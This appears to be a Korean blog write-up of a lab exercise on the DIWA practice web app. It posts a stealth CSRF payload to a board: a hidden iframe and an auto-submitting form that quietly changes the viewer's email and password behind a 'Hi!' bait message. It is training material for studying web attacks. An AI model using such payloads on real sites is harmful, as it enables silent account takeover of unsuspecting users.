CSRF 스텔스 버전

CSRF 스텔스 버전

DIWA 게시판에 글을 작성해 CSRF 공격을 실습하도록 한다.

지난번엔 회원정보 수정과 동시에 회원정보수정 페이지로 이동하였다면

이번엔 회원정보수정페이지로 이동이나 눈에 띄는 변화 없이 회원정보가 수정되는 스크립트를 작성해 보도록 하자

먼저 게시판에 글을 작성하도록 한다.

스크립트 구문 >

Hi!
<iframe width="0" height="0" border="0" name="dummyframe" id="dummyframe" style="display: none;"></iframe>
<body onload="document.form.submit();">
<form method="POST" name="form" action="http://192.168.238.134/diwa-master/app/?page=editprofile" target="dummyframe">
    <input type="hidden" name="email" value="jsw4215van@gmail.com">
<input type="hidden" name="country" value="Korea%2C+Republic+of">
<input type="hidden" name="password" value="123123">
<input type="hidden" name="password-repeat" value="123123">
</form>

위와 같이 작성하면 Hi!라는 미끼 글을 제외한 아래의 스크립트는 나타나지 않은 상태로 회원정보가 수정될 것이다.

작성된 글에 접근

Hi! 를 제외한 스크립트 구문은 보이지 않고

별다른 특이사항이 눈에 띄지 않은 채로 회원정보가 수정된다.